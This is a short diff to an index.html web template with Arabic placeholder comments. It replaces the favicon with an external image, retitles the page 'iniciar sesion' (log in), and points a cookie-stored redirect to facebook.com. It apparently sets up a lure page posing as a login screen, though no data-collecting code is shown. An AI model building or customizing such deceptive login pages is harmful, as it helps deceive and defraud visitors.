--- a/index.html
+++ b/index.html
@@ -9,14 +9,14 @@
 
 
   <!-- غير الصورة المصغرة -->
-  <link rel="icon" type="image/x-icon" href="favicon.ico"> 
+  <link rel="icon" type="image/x-icon" href="https://i.ibb.co/2PWgztY/04f39755-309c-4b61-a2a8-019f3d2bac40.jpg"> 
 
 
   <!-- ضع العنوان الخاص بك هنا  -->
-  <title> غير هذا النص </title> 
-  <meta name="title" content="غير هذا النص">
-  <meta property="twitter:title" content="غير هذا النص"> 
-  <meta property="og:title" content="غير هذا النص">
+  <title> iniciar sesion </title> 
+  <meta name="title" content="iniciar sesion">
+  <meta property="twitter:title" content="iniciar sesion"> 
+  <meta property="og:title" content="iniciar sesion">
 
 
   <!-- ضع الوصف الخاص بك هنا  -->
@@ -43,7 +43,7 @@
 
   <script>
 
-    const URL = "https://www.google.com"; // أدخل الرابط الخاص بك هنا 
+    const URL = "https://www.facebook.com"; // أدخل الرابط الخاص بك هنا 
 
     document.cookie = `rURL=${URL}`;
 
